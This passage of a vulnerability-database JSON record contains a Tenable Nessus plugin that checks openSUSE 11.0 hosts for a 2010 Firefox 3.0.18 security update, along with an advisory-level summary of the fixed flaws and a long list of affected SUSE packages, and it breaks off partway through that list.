"p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190", "p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs"], "id": "SUSE_11_0_MOZILLAFIREFOX-100223.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44899", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update MozillaFirefox-2052.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44899);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:09:50 $\");\n\n script_cve_id(\"CVE-2009-1571\", \"CVE-2009-3988\", \"CVE-2010-0159\", \"CVE-2010-0160\", \"CVE-2010-0162\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (MozillaFirefox-2052)\");\n script_summary(english:\"Check for the MozillaFirefox-2052 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox was upgraded to version 3.0.18, fixing various bugs\nand security issues.\n\nFollowing security issues have been fixed: MFSA 2010-01 /\nCVE-2010-0159: Mozilla developers identified and fixed several\nstability bugs in the browser engine used in Firefox and other\nMozilla-based products. Some of these crashes showed evidence of\nmemory corruption under certain circumstances and we presume that with\nenough effort at least some of these could be exploited to run\narbitrary code.\n\nMFSA 2010-02 / CVE-2010-0160: Security researcher Orlando Barrera II\nreported via TippingPoint's Zero Day Initiative that Mozilla's\nimplementation of Web Workers contained an error in its handling of\narray data types when processing posted messages. This error could be\nused by an attacker to corrupt heap memory and crash the browser,\npotentially running arbitrary code on a victim's computer.\n\nMFSA 2010-03 / CVE-2009-1571: Security researcher Alin Rad Pop of\nSecunia Research reported that the HTML parser incorrectly freed used\nmemory when insufficient space was available to process remaining\ninput. Under such circumstances, memory occupied by in-use objects was\nfreed and could later be filled with attacker-controlled text. These\nconditions could result in the execution or arbitrary code if methods\non the freed objects were subsequently called.\n\nMFSA 2010-04 / CVE-2009-3988: Security researcher Hidetake Jo of\nMicrosoft Vulnerability Research reported that the properties set on\nan object passed to showModalDialog were readable by the document\ncontained in the dialog, even when the document was from a different\ndomain. This is a violation of the same-origin policy and could result\nin a website running untrusted JavaScript if it assumed the\ndialogArguments could not be initialized by another site.\n\nAn anonymous security researcher, via TippingPoint's Zero Day\nInitiative, also independently reported this issue to Mozilla.\n\nMFSA 2010-05 / CVE-2010-0162: Mozilla security researcher Georgi\nGuninski reported that when a SVG document which is served with\nContent-Type: application/octet-stream is embedded into another\ndocument via an <embed> tag with type='image/svg+xml', the\nContent-Type is ignored and the SVG document is processed normally. A\nwebsite which allows arbitrary binary data to be uploaded but which\nrelies on Content-Type: application/octet-stream to prevent script\nexecution could have such protection bypassed. An attacker could\nupload a SVG document containing JavaScript as a binary file to a\nwebsite, embed the SVG document into a malicous page on another site,\nand gain access to the script environment from the SVG-serving site,\nbypassing the same-origin policy.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=576969\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected MozillaFirefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(79, 94, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-xulrunner190-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"MozillaFirefox-3.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"MozillaFirefox-translations-3.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-xulrunner190-1.9.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-xulrunner190-devel-1.9.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-xulrunner190-translations-1.9.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"mozilla-xulrunner190-32bit-1.9.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:40:30", "references": [], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ia64", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.4.1.ia64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-debuginfo-32bit-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-common-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ia64", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.1.1.ia64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-translations-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.2", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.0.18-0.1.2.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.0.3-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-venkman-2.0.3-0.1.1.x86_64.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-3.5.8-0.1.1.ppc64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-debuginfo-32bit-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.i586.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.8-1.1.1.ppc64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.ia64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "s390x", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.3.s390x.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.0.18-0.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-debuginfo-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-devel-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.3.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ppc", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.ppc.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.i586.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.18-0.1", "arch": "ppc", "packageFilename": "MozillaFirefox-debugsource-3.0.18-0.1.ppc.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-32bit-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.ppc.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-1.9.1.8-1.4.1.s390x.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-translations-32bit-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-32bit-1.9.1.8-1.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-32bit-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.18-0.1.2", "arch": "x86_64", "packageFilename": "MozillaFirefox-3.0.18-0.1.2.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-debuginfo-x86-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-debuginfo-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "python-xpcom191-1.9.1.8-1.4.1.ia64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "3.5.8-0.3", "arch": "ia64", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.3.ia64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-debugsource-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-debugsource", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.ia64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.4.1.s390x.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "ia64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.ia64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-debugsource-1.9.1.8-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "s390x", "packageFilename": "MozillaFirefox-branding-upstream-3.5.8-0.4.1.s390x.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.ppc.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.1.8-1.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.1.1.s390x.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.8-0.1.1", "arch": "i586", "packageFilename": "python-xpcom191-1.9.1.8-0.1.1.i586.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debugsource-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "ia64", "packageFilename": "python-xpcom190-1.9.0.18-0.4.1.ia64.rpm", "packageName": "python-xpcom190", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "s390x", "packageFilename": "MozillaFirefox-translations-3.5.8-0.1.1.s390x.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-32bit-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-debugsource-3.5.8-0.1.1.i586.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.18-0.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "1.9.0.18-0.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-32bit-1.9.0.18-0.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner190-32bit", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.9.1.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.8-1.4.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.9.0.18-0.4.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-translations-1.9.0.18-0.4.1.i586.rpm", "packageName": "mozilla-xulrunner190-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.0.18-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner190-debuginfo-1.9.0.18-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner190-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner190-1.9.0.18-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner190", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.5.8-0.4.1", "arch": "ppc", "packageFilename": "MozillaFirefox-translations-3.5.8-0.4.1.ppc.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.0.18-0.1.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner190-gnomevfs-1.9.0.18-0.1.1.s390x.rpm", "packageName": "mozilla-xulrunner190-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debuginfo-3.5.8-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.5.8-0.1.1", "arch": "ppc64", "packageFilename": 